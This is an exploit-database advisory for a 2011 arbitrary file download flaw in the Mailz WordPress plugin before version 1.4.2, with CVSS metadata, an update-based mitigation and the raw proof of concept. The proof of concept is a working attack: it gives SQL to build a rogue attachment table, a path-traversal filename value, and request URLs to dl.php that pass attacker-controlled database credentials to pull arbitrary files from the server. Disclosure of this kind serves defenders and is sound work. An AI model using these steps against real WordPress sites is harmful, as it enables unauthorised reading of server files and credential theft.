Mailing List plugin for Wordpress Arbitrary file download

vendor:

Mailz

by:

6Scan security team

8.8

CVSS

HIGH

Arbitrary File Download

434

CWE

Product Name: Mailz

Affected Version From: < 1.4.2

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: a:zingiri:mailz

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

Mailing List plugin for WordPress Arbitrary file download

Unauthorized users can download arbitrary files from the server using this exploit. The bug is in config.php, but accessible from other file. The PoC involves setting up a MySQL database, creating a table with a specific structure, adding a raw into the database, and calling the script with database parameters and file id to download.

Mitigation:

Update to version 1.4.2 or later

Source

Exploit-DB raw data:

#Exploit Title: Mailing List plugin for Wordpress Arbitrary file download
#Version:  < 1.4.2
#Date: 2011-12-19
#Author: 6Scan (http://6scan.com) security team
#Software Link: http://wordpress.org/extend/plugins/mailz/
#Official fix: This advisory is released after the vendor (http://www.zingiri.com)  was contacted and fixed the issue promptly.
#Description :  Unauthorized users can download arbitrary files from the server using this exploit.
#                                                             Vulnerable script includes config.php file, which connects to database with supplied credentials. Database entries are used to retrieve files from host.
#                                                             The bug is in config.php, but accessible from other file.

PoC
1) Setup mysql database
2) Create table with the next structure:
CREATE TABLE IF NOT EXISTS `phplist_attachment` (
  `filename` varchar(1024) NOT NULL,
  `mimetype` varchar(1024) NOT NULL,
  `remotefile` varchar(1024) NOT NULL,
  `description` varchar(1024) NOT NULL,
  `size` int(11) NOT NULL,
  `id` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

3) Add this raw into database:
INSERT INTO `phplist_attachment` (`filename`, `mimetype`, `remotefile`, `description`, `size`, `id`) VALUES
('../../../../../somefile.txt', '', '', '', 0, 0);


4) Call the script with database parameters and file id to download:

http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?wph=localhost&wpdb=test&user=root&wpp=root&id=0

The credentials are now saved in session, and there is no need to continue passing them:
http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=1
http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=2
http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=3